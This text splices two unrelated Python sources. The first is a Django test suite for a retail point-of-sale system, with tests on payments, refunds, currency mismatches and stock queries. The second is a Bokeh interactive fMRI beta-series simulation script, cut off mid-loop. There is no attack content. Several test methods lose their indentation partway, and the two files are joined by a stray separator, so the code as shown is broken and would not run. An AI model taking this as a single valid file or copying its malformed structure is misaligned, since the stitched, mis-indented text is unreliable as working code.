article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count = 10
p = Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23)
otl = OtherTransactionLine(count=count, price=p, text="Meh", accounting_group=self.acc_group)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[otl])
tl = TransactionLine.objects.get()
otl = OtherTransactionLine.objects.get()
self.assertEquals(otl.count, count)
self.assertFalse(otl.isRefunded)
self.assertEquals(otl.text, "Meh")
self.assertEquals(otl.num, -1)
    def test_sales_transaction_wrong_currency(self):
        """Paying in a currency other than the system currency must raise InvalidDataException."""
        AMOUNT_1 = 6
        AMOUNT_2 = 10
        AMOUNT_3 = 5
        Order.create_order_from_wishables_combinations(self.copro, self.customer,
                                                       [[self.article_type, AMOUNT_1, self.price],
                                                        [self.at2, AMOUNT_2, self.price], [self.other_cost, AMOUNT_3,
                                                                                           self.price]])
        SupplierOrder.create_supplier_order(self.copro, self.supplier,
                                            articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
                                                              [self.at2, AMOUNT_2, self.cost]])
        PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
                                                article_type_cost_combinations=[[self.article_type, AMOUNT_1],
                                                                                [self.at2, AMOUNT_2]],
                                                packing_document_name="Foo")
        count = 10
        p = Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23)
        otl = OtherTransactionLine(count=count, price=p, text="Meh", accounting_group=self.acc_group)
        # "USD" deliberately mismatches USED_CURRENCY used everywhere else in these tests.
        loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency("USD"))
        local_payment = Payment(amount=loc_money, payment_type=self.pt)
        with self.assertRaises(InvalidDataException):
            Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[otl])
    def test_sales_transaction_two_payments(self):
        """A transaction may be settled by two payments (different payment types) that
        together exactly cover the total; no exception expected."""
        AMOUNT_1 = 6
        AMOUNT_2 = 10
        AMOUNT_3 = 5
        Order.create_order_from_wishables_combinations(self.copro, self.customer,
                                                       [[self.article_type, AMOUNT_1, self.price],
                                                        [self.at2, AMOUNT_2, self.price], [self.other_cost, AMOUNT_3,
                                                                                           self.price]])
        SupplierOrder.create_supplier_order(self.copro, self.supplier,
                                            articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
                                                              [self.at2, AMOUNT_2, self.cost]])
        PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
                                                article_type_cost_combinations=[[self.article_type, AMOUNT_1],
                                                                                [self.at2, AMOUNT_2]],
                                                packing_document_name="Foo")
        count = 10
        p = Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23)
        otl = OtherTransactionLine(count=count, price=p, text="Meh", accounting_group=self.acc_group)
        # Split the total: (total - 1) via pt, plus 1 via pt2 (handled by register2).
        loc_money = Money(amount=self.simple_payment_eur.amount.amount * count - Decimal(1),
                          currency=Currency(USED_CURRENCY))
        local_payment = Payment(amount=loc_money, payment_type=self.pt)
        local_payment2 = Payment(amount=Money(amount=Decimal(1), currency=Currency(USED_CURRENCY)),
                                 payment_type=self.pt2)
        Transaction.create_transaction(user=self.copro, payments=[local_payment, local_payment2],
                                       transaction_lines=[otl])
def test_sales_transaction_mixed_transaction_lines(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
AMOUNT_3 = 5
order = Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price], [self.other_cost, AMOUNT_3,
self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count_1 = AMOUNT_1 - 4
count_2 = AMOUNT_2 - 2
count_3 = AMOUNT_3 - 2
count_4 = 10
total_count = count_1 + count_2 + count_3 + count_4
p = Price(amount=Decimal(1), use_system_currency=True, vat=1.23)
stl_1 = SalesTransactionLine(count=count_1, price=p, article=self.article_type, order=order.id)
stl_2 = SalesTransactionLine(count=count_2, price=p, article=self.at2, order=order.id)
octl = OtherCostTransactionLine(count=count_3, price=p, other_cost_type=self.other_cost)
otl = OtherTransactionLine(count=count_4, price=p, text="Rand", accounting_group=self.acc_group)
loc_money = Money(amount=Decimal(1) * total_count - Decimal(1), currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
local_payment2 = Payment(amount=Money(amount=Decimal(1), currency=Currency(USED_CURRENCY)),
payment_type=self.pt2)
Transaction.create_transaction(user=self.copro, payments=[local_payment, local_payment2],
transaction_lines=[stl_1, stl_2, octl, otl])
tls = TransactionLine.objects.all()
self.assertEquals(len(tls), 4)
stls = SalesTransactionLine.objects.all()
self.assertEquals(len(stls), 2)
OtherCostTransactionLine.objects.get()
OtherTransactionLine.objects.get()
pmnts = Payment.objects.all()
self.assertEquals(len(pmnts), 2)
Transaction.objects.get()
def test_transaction_payment_not_in_opened_register(self):
    """Paying with a type whose register is not open raises PaymentTypeError."""
    line_count = 2
    unit_price = Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23)
    sale_line = OtherTransactionLine(count=line_count, price=unit_price, text="Meh",
                                     accounting_group=self.acc_group)
    sale_total = Money(amount=self.simple_payment_eur.amount.amount * line_count,
                       currency=Currency(USED_CURRENCY))
    # self.pt3 belongs to a register that was never opened.
    bad_payment = Payment(amount=sale_total, payment_type=self.pt3)
    with self.assertRaises(PaymentTypeError):
        Transaction.create_transaction(user=self.copro, payments=[bad_payment],
                                       transaction_lines=[sale_line])
def test_refund_line(self):
    """A refund line inherits metadata from the sold line it refunds.

    Sells 5 items, refunds 2, and checks the stored refund line has no
    order, a sentinel num of -1, the refund count, and the original text.
    """
    count = 5
    p = Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23)
    otl = OtherTransactionLine(count=count, price=p, text="Meh", accounting_group=self.acc_group)
    loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
    local_payment = Payment(amount=loc_money, payment_type=self.pt)
    Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[otl])
    count_refund = -2
    trl = TransactionLine.objects.get()
    rfl = RefundTransactionLine(count=count_refund, price=p, sold_transaction_line=trl)
    loc_money = Money(amount=self.simple_payment_eur.amount.amount * count_refund, currency=Currency(USED_CURRENCY))
    nega_payment = Payment(amount=loc_money, payment_type=self.pt)
    Transaction.create_transaction(user=self.copro, payments=[nega_payment], transaction_lines=[rfl])
    trls = TransactionLine.objects.all()
    # assertEqual instead of the deprecated assertEquals alias.
    self.assertEqual(len(trls), 2)
    self.assertIsNone(trls[1].order)
    self.assertEqual(trls[1].num, -1)
    self.assertEqual(trls[1].count, count_refund)
    self.assertEqual(trls[1].text, trls[0].text)
def test_refund_line_too_many_refunded(self):
    """Refunding more items than were sold must raise RefundError."""
    sold_count = 5
    unit_price = Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23)
    sold_line = OtherTransactionLine(count=sold_count, price=unit_price, text="Meh",
                                     accounting_group=self.acc_group)
    sale_total = Money(amount=self.simple_payment_eur.amount.amount * sold_count,
                       currency=Currency(USED_CURRENCY))
    sale_payment = Payment(amount=sale_total, payment_type=self.pt)
    Transaction.create_transaction(user=self.copro, payments=[sale_payment],
                                   transaction_lines=[sold_line])
    # Attempt to refund one item more than was sold.
    refund_count = -6
    sold_trl = TransactionLine.objects.get()
    refund_line = RefundTransactionLine(count=refund_count, price=unit_price,
                                        sold_transaction_line=sold_trl)
    refund_total = Money(amount=self.simple_payment_eur.amount.amount * refund_count,
                         currency=Currency(USED_CURRENCY))
    refund_payment = Payment(amount=refund_total, payment_type=self.pt)
    with self.assertRaises(RefundError):
        Transaction.create_transaction(user=self.copro, payments=[refund_payment],
                                       transaction_lines=[refund_line])
def test_refund_line_just_enough_refunded(self):
    """Refunding exactly the sold count succeeds (boundary case)."""
    sold_count = 5
    unit_price = Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23)
    sold_line = OtherTransactionLine(count=sold_count, price=unit_price, text="Meh",
                                     accounting_group=self.acc_group)
    sale_total = Money(amount=self.simple_payment_eur.amount.amount * sold_count,
                       currency=Currency(USED_CURRENCY))
    sale_payment = Payment(amount=sale_total, payment_type=self.pt)
    Transaction.create_transaction(user=self.copro, payments=[sale_payment],
                                   transaction_lines=[sold_line])
    # Refund every sold item; this must not raise.
    refund_count = -5
    sold_trl = TransactionLine.objects.get()
    refund_line = RefundTransactionLine(count=refund_count, price=unit_price,
                                        sold_transaction_line=sold_trl)
    refund_total = Money(amount=self.simple_payment_eur.amount.amount * refund_count,
                         currency=Currency(USED_CURRENCY))
    refund_payment = Payment(amount=refund_total, payment_type=self.pt)
    Transaction.create_transaction(user=self.copro, payments=[refund_payment],
                                   transaction_lines=[refund_line])
def test_refund_line_too_many_refunded_two_new_refunds(self):
    """Refund lines in one transaction are limited jointly, not per line."""
    sold_count = 5
    unit_price = Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23)
    sold_line = OtherTransactionLine(count=sold_count, price=unit_price, text="Meh",
                                     accounting_group=self.acc_group)
    sale_total = Money(amount=self.simple_payment_eur.amount.amount * sold_count,
                       currency=Currency(USED_CURRENCY))
    sale_payment = Payment(amount=sale_total, payment_type=self.pt)
    Transaction.create_transaction(user=self.copro, payments=[sale_payment],
                                   transaction_lines=[sold_line])
    # Each refund alone is fine; together they exceed the sold count.
    refund_count_1 = -3
    refund_count_2 = -3
    refund_count_total = refund_count_1 + refund_count_2
    sold_trl = TransactionLine.objects.get()
    refund_line_1 = RefundTransactionLine(count=refund_count_1, price=unit_price,
                                          sold_transaction_line=sold_trl)
    refund_line_2 = RefundTransactionLine(count=refund_count_2, price=unit_price,
                                          sold_transaction_line=sold_trl)
    refund_total = Money(amount=self.simple_payment_eur.amount.amount * refund_count_total,
                         currency=Currency(USED_CURRENCY))
    refund_payment = Payment(amount=refund_total, payment_type=self.pt)
    with self.assertRaises(RefundError):
        Transaction.create_transaction(user=self.copro, payments=[refund_payment],
                                       transaction_lines=[refund_line_1, refund_line_2])
def test_refund_line_too_many_old_new_refunded(self):
    """Refunds from earlier transactions count toward the refund limit.

    Sells 5, refunds 2 + 2 in one transaction, then a further refund of 2
    would exceed the sold count and must raise RefundError.
    """
    count = 5
    p = Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23)
    otl = OtherTransactionLine(count=count, price=p, text="Meh", accounting_group=self.acc_group)
    loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
    local_payment = Payment(amount=loc_money, payment_type=self.pt)
    Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[otl])
    trl = TransactionLine.objects.get()
    # Two refunds that together stay within the sold count (4 of 5)...
    count_refund = -2
    count_refund2 = -2
    count_refund_new = -2
    rfl = RefundTransactionLine(count=count_refund, price=p, sold_transaction_line=trl)
    rfl2 = RefundTransactionLine(count=count_refund2, price=p, sold_transaction_line=trl)
    loc_money = Money(amount=self.simple_payment_eur.amount.amount * (count_refund + count_refund2),
                      currency=Currency(USED_CURRENCY))
    nega_payment = Payment(amount=loc_money, payment_type=self.pt)
    Transaction.create_transaction(user=self.copro, payments=[nega_payment], transaction_lines=[rfl, rfl2])
    # ...then one more refund pushes the total past the sold count.
    rfl3 = RefundTransactionLine(count=count_refund_new, price=p, sold_transaction_line=trl)
    loc_money = Money(amount=self.simple_payment_eur.amount.amount * count_refund_new,
                      currency=Currency(USED_CURRENCY))
    last_payment = Payment(amount=loc_money, payment_type=self.pt)
    with self.assertRaises(RefundError):
        Transaction.create_transaction(user=self.copro, payments=[last_payment], transaction_lines=[rfl3])
class TestSalesFeaturesWithMixin(TestCase, TestData):
    """Sales scenarios built on the shared TestData fixture mixin."""

    def setUp(self):
        self.setup_base_data()

    def test_other_cost(self):
        """Other-cost lines can only be sold up to the ordered amount."""
        oth_count = 8
        order = self.create_custorders(othercost_1=oth_count)
        self.create_suporders()
        self.create_packingdocuments()
        self.register_3.open(Decimal(0))
        octl_1 = OtherCostTransactionLine(price=self.price_system_currency_1, count=oth_count,
                                          other_cost_type=self.othercosttype_1, order=order.id)
        money_3 = Money(amount=self.price_system_currency_1.amount * oth_count,
                        currency=self.price_system_currency_1.currency)
        pymnt_3 = Payment(amount=money_3, payment_type=self.paymenttype_maestro)
        Transaction.create_transaction(user=self.user_2, payments=[pymnt_3], transaction_lines=[octl_1],
                                       customer=self.customer_person_2)
        # The order is now exhausted; selling one more must fail.
        octl_1 = OtherCostTransactionLine(price=self.price_system_currency_1, count=1,
                                          other_cost_type=self.othercosttype_1, order=order.id)
        money_3 = Money(amount=self.price_system_currency_1.amount * 1, currency=self.price_system_currency_1.currency)
        pymnt_3 = Payment(amount=money_3, payment_type=self.paymenttype_maestro)
        with self.assertRaises(NotEnoughOrderLinesError):
            Transaction.create_transaction(user=self.user_2, payments=[pymnt_3], transaction_lines=[octl_1],
                                           customer=self.customer_person_2)

    def test_refund_stock_amount(self):
        """Refunding a sold article puts it back on the label-less stock."""
        order = self.create_custorders()
        self.create_suporders()
        self.create_packingdocuments(article_1=3)
        self.create_transactions_article_type_for_order(article_1=2, order=order.id)
        stl = SalesTransactionLine.objects.get(article=self.articletype_1)
        rfl_1 = RefundTransactionLine(price=self.price_system_currency_1, count=-1, sold_transaction_line=stl)
        money_1 = Money(amount=self.price_system_currency_1.amount * -1, currency=self.price_system_currency_1.currency)
        pymnt_1 = Payment(amount=money_1, payment_type=self.paymenttype_maestro)
        # One of the three received items is still on stock before the refund.
        st_level = Stock.objects.get(article=self.articletype_1)
        self.assertEqual(st_level.count, 1)
        Transaction.create_transaction(user=self.user_2, payments=[pymnt_1], transaction_lines=[rfl_1],
                                       customer=self.customer_person_2)
        # The refunded item lands on the general (unlabeled) stock pile.
        st_level = Stock.objects.get(article=self.articletype_1, labeltype__isnull=True)
        self.assertEqual(st_level.count, 1)

    def test_no_matching_currency(self):
        """Paying in a currency with no matching open register raises PaymentTypeError."""
        rupee = CurrencyData(iso="INR", name="Indian Rupee", digits=2, symbol="₹")
        rupee.save()
        new_register = Register(name="<NAME>", currency=rupee, payment_type=self.paymenttype_maestro)
        new_register.save()
        new_register.open(Decimal(0))
        self.create_custorders()
        oth_count = 2
        octl_1 = OtherCostTransactionLine(price=self.price_system_currency_1, count=oth_count,
                                          other_cost_type=self.othercosttype_1, order=1)
        money_3 = Money(amount=self.price_system_currency_1.amount * oth_count,
                        currency=self.price_system_currency_1.currency)
        pymnt_3 = Payment(amount=money_3, payment_type=self.paymenttype_maestro)
        with self.assertRaises(PaymentTypeError):
            Transaction.create_transaction(user=self.user_2, payments=[pymnt_3], transaction_lines=[octl_1],
                                           customer=self.customer_person_2)

    def test_mixing_payment_currency(self):
        """Mixing payment currencies within one sales period is rejected."""
        rupee = CurrencyData(iso="INR", name="Indian Rupee", digits=2, symbol="₹")
        rupee.save()
        new_register = Register(name="<NAME>", currency=rupee, payment_type=self.paymenttype_maestro)
        new_register.save()
        new_register.open(Decimal(0))
        # Fake transaction with indian rupees, this cannot be done without changing the USED_CURRENCY
        # string which is not possible in this test environment
        transaction = Transaction(salesperiod=RegisterMaster.get_open_sales_period(), customer=None,
                                  user_modified=self.user_1)
        # super().save() deliberately bypasses the model's own validation.
        super(Transaction, transaction).save()
        price = Price(amount=Decimal(1), currency=Currency("INR"), vat=Decimal("1"))
        money = Money(amount=Decimal(1), currency=Currency("INR"))
        transaction_line = OtherCostTransactionLine(other_cost_type=self.othercosttype_1, transaction=transaction,
                                                    num=self.othercosttype_1.pk, text="Foo", order=None,
                                                    accounting_group=self.accounting_group_components, price=price,
                                                    user_modified=self.user_1, count=1)
        super(TransactionLine, transaction_line).save()
        payment = Payment(transaction=transaction, amount=money, payment_type=self.paymenttype_maestro)
        super(Payment, payment).save()
        self.register_3.open(Decimal(0))
        # A normal system-currency payment must now conflict with the rupee one.
        octl_1 = OtherCostTransactionLine(price=self.price_system_currency_1, count=1,
                                          other_cost_type=self.othercosttype_1, order=None)
        money_3 = Money(amount=self.price_system_currency_1.amount * 1,
                        currency=self.price_system_currency_1.currency)
        pymnt_3 = Payment(amount=money_3, payment_type=self.paymenttype_maestro)
        with self.assertRaises(PaymentTypeError):
            Transaction.create_transaction(user=self.user_2, payments=[pymnt_3], transaction_lines=[octl_1],
                                           customer=self.customer_person_2)

    def test_original_pricing_price_override(self):
        """A PriceOverride attached to a line is persisted and linked back."""
        self.create_externalisation()
        self.register_3.open(Decimal(0))
        octl_1 = OtherCostTransactionLine(price=self.price_system_currency_1, count=1,
                                          other_cost_type=self.othercosttype_1, order=None,
                                          original_price=PriceOverride(original_price=self.price_systen_currency_2, user=self.user_1, reason="Banaan"))
        money_3 = Money(amount=self.price_system_currency_1.amount * 1,
                        currency=self.price_system_currency_1.currency)
        pymnt_3 = Payment(amount=money_3, payment_type=self.paymenttype_maestro)
        Transaction.create_transaction(user=self.user_2, payments=[pymnt_3], transaction_lines=[octl_1],
                                       customer=self.customer_person_2)
        octl = OtherCostTransactionLine.objects.get()
        original_price = PriceOverride.objects.get()
        self.assertEqual(octl.original_price, original_price)

    def test_no_price_override_returns_null(self):
        """Without an override the stored original_price stays None."""
        self.create_externalisation()
        self.register_3.open(Decimal(0))
        octl_1 = OtherCostTransactionLine(price=self.price_system_currency_1, count=1,
                                          other_cost_type=self.othercosttype_1, order=None)
        money_3 = Money(amount=self.price_system_currency_1.amount * 1,
                        currency=self.price_system_currency_1.currency)
        pymnt_3 = Payment(amount=money_3, payment_type=self.paymenttype_maestro)
        Transaction.create_transaction(user=self.user_2, payments=[pymnt_3], transaction_lines=[octl_1],
                                       customer=self.customer_person_2)
        octl = OtherCostTransactionLine.objects.get()
        self.assertIsNone(octl.original_price)
class StockTests(TestCase, TestData):
    """Per-customer stock aggregation queries (StockCollections)."""

    def setUp(self):
        self.setup_base_data()
        # Give both article types a fixed sales price so price lookups resolve.
        # (price_systen_currency_2 is the fixture's existing attribute name.)
        self.articletype_1.fixed_price = self.price_system_currency_1
        self.articletype_1.save()
        self.articletype_2.fixed_price = self.price_systen_currency_2
        self.articletype_2.save()

    def test_get_stock_for_customer(self):
        """Only unlabeled stock shows up in the general stock-with-prices view."""
        # Two labeled (OrderLabel) and two unlabeled stock entries per article.
        changeset = [
            {
                'article': self.articletype_1,
                'book_value': self.cost_system_currency_1,
                'count': 3,
                'is_in': True,
                'label': OrderLabel(1)
            },
            {
                'article': self.articletype_1,
                'book_value': self.cost_system_currency_1,
                'count': 5,
                'is_in': True,
            },
            {
                'article': self.articletype_2,
                'book_value': self.cost_system_currency_2,
                'count': 6,
                'is_in': True,
            },
            {
                'article': self.articletype_2,
                'book_value': self.cost_system_currency_2,
                'count': 7,
                'is_in': True,
                'label': OrderLabel(2)
            }
        ]
        StockChangeSet.construct(description="Bla", entries=changeset, source=StockChangeSet.SOURCE_TEST_DO_NOT_USE)
        result = StockCollections.get_stock_with_prices(self.customer_person_1)
        # Only the two unlabeled entries (counts 5 and 6) should be returned.
        self.assertEqual(len(result), 2)
        for line in result:
            if line[0].article == self.articletype_1:
                self.assertEqual(line[0].count, 5)
                self.assertEqual(line[1].amount, self.price_system_currency_1.amount)
            else:
                self.assertEqual(line[0].count, 6)
                self.assertEqual(line[1].amount, self.price_systen_currency_2.amount)

    def test_get_order_stock_for_customers(self):
        """Customer-labeled stock is returned with the fixed article prices."""
        self.create_custorders()
        self.create_suporders()
        PACK_ART_1 = 3
        PACK_ART_2 = 4
        self.create_packingdocuments(article_1=PACK_ART_1, article_2=PACK_ART_2)
        result = StockCollections.get_stock_for_customer_with_prices(customer=self.customer_person_1)
        correct_price = {self.articletype_1: self.price_system_currency_1,
                         self.articletype_2: self.price_systen_currency_2}
        correct_amount = {self.articletype_1: PACK_ART_1,
                          self.articletype_2: PACK_ART_2}
        for line in result:
            self.assertEqual(line[1], correct_price.get(line[0].article))
            self.assertEqual(line[0].count, correct_amount.get(line[0].article))

    def test_get_mixed_orders_only_get_correct_ones(self):
        """Stock is partitioned per customer, even for the same article types."""
        self.create_custorders(article_1=5,article_2=7, customer=self.customer_person_1)
        self.create_custorders(article_1=2, article_2=3, customer=self.customer_person_2)
        self.create_suporders(article_1=7, article_2=10)
        self.create_packingdocuments(article_1=7, article_2=10)
        result = StockCollections.get_stock_for_customer_with_prices(customer=self.customer_person_1)
        for line in result:
            self.assertTrue(line[0].count in [5, 7])
        result2 = StockCollections.get_stock_for_customer_with_prices(customer=self.customer_person_2)
        for line in result2:
            self.assertTrue(line[0].count in [2, 3])

    def test_get_only_stock_mixed(self):
        """General stock view excludes customer-ordered items."""
        self.create_custorders(article_1=5, article_2=7, customer=self.customer_person_1)
        # One extra unit for general stock via a stock wish.
        self.create_stockwish(article_1=1, article_2=0)
        self.create_suporders(article_1=6, article_2=7)
        self.create_packingdocuments(article_1=6, article_2=7)
        result = StockCollections.get_stock_with_prices(customer=self.customer_person_1)
        self.assertEqual(len(result), 1)
        self.assertEqual(result[0][0].count, 1)
        self.assertEqual(result[0][0].article, self.articletype_1)
|
''' Present an interactive beta-series simulation with slider widgets.
Scrub the sliders to change the trial-type correlations and the noise
level of the two simulated regions' signals; toggle buttons show or
hide the per-trial beta labels.
Use the ``bokeh serve`` command to run the example by executing:
bokeh serve sliders.py
at your command prompt. Then navigate to the URL
http://localhost:5006/sliders
in your browser.
'''
import numpy as np
from nistats import hemodynamic_models
from statsmodels.tsa.arima_process import ArmaProcess
import pandas as pd
from scipy.optimize import minimize
from bokeh.layouts import grid
from bokeh.core.properties import value
from bokeh.palettes import Dark2
from bokeh.io import curdoc
from bokeh.layouts import column
from bokeh.models import ColumnDataSource, Label, Div, Toggle, LabelSet
from bokeh.models.widgets import Slider
from bokeh.plotting import figure
from bokeh.models.glyphs import Segment
def generate_2voxels_signal(tr=1, corr=0, n_trials=15,
                            initial_guess=None,
                            design_resolution=0.1,
                            onset_offset=0,
                            timepoints=200):
    """Simulate two regions' signals whose per-trial betas are correlated.

    Betas are sampled and then optimized until their observed correlation
    matches ``corr`` (within 0.1); each region's signal is an HRF-convolved
    event design weighted by its beta series.

    Returns
    -------
    (onsets, betas, region1, region2) : trial onsets (in volumes), the
    (n_trials, 2) beta matrix, and the two simulated time series.
    """
    np.random.seed(12345)
    # 2x2 target correlation matrix between the two regions' betas
    corr_mat = np.array([[1, corr], [corr, 1]])
    trial_interval = int(timepoints / n_trials)
    onsets = np.array(range(onset_offset, timepoints-10, trial_interval))
    # want the mean betas of each voxel to be one
    gnd_means = np.ones(2)
    # continue while loop while the target correlations
    # are more than 0.1 off
    c_wrong = True
    c_tol = 0.1
    while c_wrong:
        # generate betas
        if initial_guess is None:
            initial_guess = np.random.multivariate_normal(
                gnd_means,
                corr_mat,
                size=(onsets.shape[0]),
                tol=0.00005
            )
        # nudge the sampled betas until their empirical correlation
        # matrix matches the target (minimizing _check_data's error)
        sim_betas = minimize(
            _check_data,
            initial_guess,
            args=(corr_mat,),
            method='BFGS',
            tol=1e-10
        ).x
        # reshape the output (comes out 1-dimensional)
        sim_betas = sim_betas.reshape(initial_guess.shape)
        corr_error = _check_data(
            sim_betas,
            corr_mat,
        )
        c_wrong = c_tol < corr_error
        # resample a fresh starting point if another pass is needed
        initial_guess = None

    mean_fix = 1 - sim_betas.mean(axis=0)
    # ensure each beta series has average of 1.
    betas = sim_betas + mean_fix
    # build the event design at high temporal resolution, then convolve
    onsets_res = (onsets // design_resolution).astype(int)
    duration_res = int(timepoints / design_resolution)
    stim_duration_res = int(0.5 / design_resolution)
    sampling_rate = int(tr / design_resolution)
    X = np.zeros((duration_res, onsets.shape[0]))
    for idx, onset in enumerate(onsets_res):
        # set the design matrix
        X[onset:onset+stim_duration_res, idx] = 1
        X[:, idx] = np.convolve(
            X[:, idx], hemodynamic_models._gamma_difference_hrf(
                tr, oversampling=sampling_rate))[0:X.shape[0]]
    # downsample X so it's back to TR resolution
    X = X[::sampling_rate, :]
    # each region's signal: design matrix weighted by its beta column
    region1 = np.squeeze(X @ betas[:, 0])
    region2 = np.squeeze(X @ betas[:, 1])
    return onsets, betas, region1, region2
def generate_noise(timepoints=200, scale=0.01):
    """Draw a reproducible AR(1) noise series of length ``timepoints``."""
    np.random.seed(12345)
    autocorr = 0.12
    # statmodels says to invert rho when building the AR polynomial
    ar_poly = np.array([1, -autocorr])
    return ArmaProcess(ar_poly).generate_sample(timepoints, scale=scale, axis=0)
def add_components(conditions, noise=None):
    """Sum signal components (plus optional noise) into one time series.

    Parameters
    ----------
    conditions : list of equal-length 1-d arrays (mutated in place when
        ``noise`` is given).
    noise : optional 1-d array appended to ``conditions`` before summing.

    Returns
    -------
    np.ndarray : element-wise sum of all components.
    """
    # `if noise:` raises "truth value of an array is ambiguous" for
    # ndarray inputs (as produced by generate_noise); compare to None.
    if noise is not None:
        conditions.append(noise)
    Y = np.sum(conditions, axis=0)
    return Y
def _check_data(x, target_corr_mat):
    """Optimizer objective: distance between the correlation matrix observed
    across the columns of ``x`` and the target correlation matrix."""
    observed = np.corrcoef(x.T)
    return _check_corr(observed, target_corr_mat)
def _check_corr(corr_mat_obs, corr_mat_gnd):
return np.sum(np.abs(corr_mat_obs - corr_mat_gnd)) / 2
# Set up data: two trial types (A uncorrelated, B highly correlated),
# interleaved via onset_offset so their events alternate in time.
corr_a = 0.0
corr_b = 0.8
timepoints = 200
# values for condition A
onsets_a, betas_a, region_1a, region_2a = generate_2voxels_signal(
    corr=corr_a, timepoints=timepoints)
# values for condition B
onsets_b, betas_b, region_1b, region_2b = generate_2voxels_signal(
    corr=corr_b, timepoints=timepoints, onset_offset=4)
# full signal
Y_region_1 = add_components([region_1a, region_1b])
Y_region_2 = add_components([region_2a, region_2b])
# one ColumnDataSource per region for the time-series plots
df_r1 = pd.DataFrame.from_dict({"Y": Y_region_1,
                                "A": region_1a,
                                "B": region_1b})
df_r2 = pd.DataFrame.from_dict({"Y": Y_region_2,
                                "A": region_2a,
                                "B": region_2b})
source_r1 = ColumnDataSource(df_r1)
source_r2 = ColumnDataSource(df_r2)
# label_source: rounded betas shown as on-plot labels and scatter points
betas_a_rnd = np.round(betas_a, 2)
betas_b_rnd = np.round(betas_b, 2)
df_ls_a = pd.DataFrame.from_dict({"onsets": onsets_a,
                                  "betas_r1": betas_a_rnd[:, 0],
                                  "betas_r2": betas_a_rnd[:, 1]})
df_ls_b = pd.DataFrame.from_dict({"onsets": onsets_b,
                                  "betas_r1": betas_b_rnd[:, 0],
                                  "betas_r2": betas_b_rnd[:, 1]})
source_la = ColumnDataSource(df_ls_a)
source_lb = ColumnDataSource(df_ls_b)
# Set up plots for time series
plot_r1 = figure(plot_height=200, plot_width=800, title="Region 1",
                 tools="crosshair,reset,save,wheel_zoom",
                 x_range=[0, timepoints], y_range=[-.2, 0.8])
plot_r2 = figure(plot_height=200, plot_width=800, title="Region 2",
                 tools="crosshair,reset,save,wheel_zoom",
                 x_range=[0, timepoints], y_range=[-0.2, 0.8])
plot_r1.xaxis.visible = plot_r2.xaxis.visible = False
plot_r1.xaxis.axis_label = plot_r2.xaxis.axis_label = "Volumes"
# Draw the summed signal Y thicker and translucent; A and B as thin lines.
for plot, source in zip([plot_r1, plot_r2], [source_r1, source_r2]):
    for name, color in zip(df_r1.columns, Dark2[3]):
        if "Y" in name:
            line_width = 4
            line_alpha = 0.6
        else:
            line_width = 2
            line_alpha = 1.
        plot.line(x='index',
                  y=name,
                  line_width=line_width,
                  line_alpha=line_alpha,
                  source=source,
                  color=color,
                  legend=value(name))
    # clicking a legend entry hides the corresponding line
    plot.legend.location = "top_left"
    plot.legend.orientation = "horizontal"
    plot.legend.click_policy = "hide"
# On-plot labels reporting the current target correlations;
# their .text is rewritten by the slider callback.
trial_type_a_corr = Label(x=159, y=175, x_units='screen', y_units='screen',
                          text='Trial Type A Correlation: {corr}'.format(corr=corr_a),
                          render_mode='css', border_line_color='black', border_line_alpha=1.0,
                          background_fill_color='white', background_fill_alpha=1.0)
trial_type_b_corr = Label(x=385, y=175, x_units='screen', y_units='screen',
                          text='Trial Type B Correlation: {corr}'.format(corr=corr_b),
                          render_mode='css', border_line_color='black', border_line_alpha=1.0,
                          background_fill_color='white', background_fill_alpha=1.0)
plot_r2.add_layout(trial_type_a_corr)
plot_r2.add_layout(trial_type_b_corr)
# Set up widgets
data_title = Div(text="<b>Correlation Settings</b>",
                 style={'font-size': '100%'}, width=200, height=30)
corr_a_widget = Slider(title="Trial Type A Correlation", value=corr_a, start=-1, end=1, step=0.1)
corr_b_widget = Slider(title="Trial Type B Correlation", value=corr_b, start=-1, end=1, step=0.1)
noise_widget = Slider(title="noise", value=0, start=0, end=0.1, step=0.01)
widgets = [data_title,
           corr_a_widget,
           corr_b_widget,
           noise_widget]
beta_a_toggle = Toggle(label="Show A Betas", button_type="success", active=True)
beta_b_toggle = Toggle(label="Show B Betas", button_type="success", active=True)
# Mark trial onsets with vertical segments and per-trial beta labels;
# region 1 segments below zero, region 2 segments just above.
for y0, y1, plot, beta_key, in zip([-0.2, 0.04],
                                   [0, 0.08],
                                   [plot_r1, plot_r2],
                                   ['betas_r1', 'betas_r2']):
